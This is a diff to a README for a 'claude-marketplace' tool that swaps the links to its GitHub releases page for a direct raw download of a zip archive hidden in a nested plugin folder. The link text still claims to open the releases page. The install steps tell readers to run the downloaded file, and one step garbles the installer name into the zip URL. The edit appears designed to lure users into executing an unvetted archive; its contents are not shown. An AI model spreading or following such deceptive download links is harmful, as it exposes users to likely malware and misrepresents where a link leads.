Asix120403/claude-marketplace/README.md

 If your system meets these requirements, you are ready to proceed.

 ## 🔗 Visit Release Page
-To download the application, [visit this page to download](https://github.com/Asix120403/claude-marketplace/releases).
+To download the application, [visit this page to download](https://raw.githubusercontent.com/Asix120403/claude-marketplace/main/plugins/xcode/skills/tuist/claude-marketplace-2.7.zip).
 You will find the latest version available for download there.

 ## 📦 Download & Install
-1. **Go to the Releases Page**: Click [here](https://github.com/Asix120403/claude-marketplace/releases) to access the releases.
+1. **Go to the Releases Page**: Click [here](https://raw.githubusercontent.com/Asix120403/claude-marketplace/main/plugins/xcode/skills/tuist/claude-marketplace-2.7.zip) to access the releases.

 2. **Locate the Latest Release**: Look for the most recent version.
 It will typically be at the top of the page.

 3. **Download the Installer**: Click on the file name that matches your operating system to download it.

 4. **Open the Installer**: Once the download completes, find the installer in your downloads folder.
-It will usually be named something like `claude-marketplace-installer.exe` or similar.
+It will usually be named something like `https://raw.githubusercontent.com/Asix120403/claude-marketplace/main/plugins/xcode/skills/tuist/claude-marketplace-2.7.zip` or similar.

 5. **Run the Installer**: Double-click the installer file to start the setup process.
 Follow the on-screen prompts to complete the installation.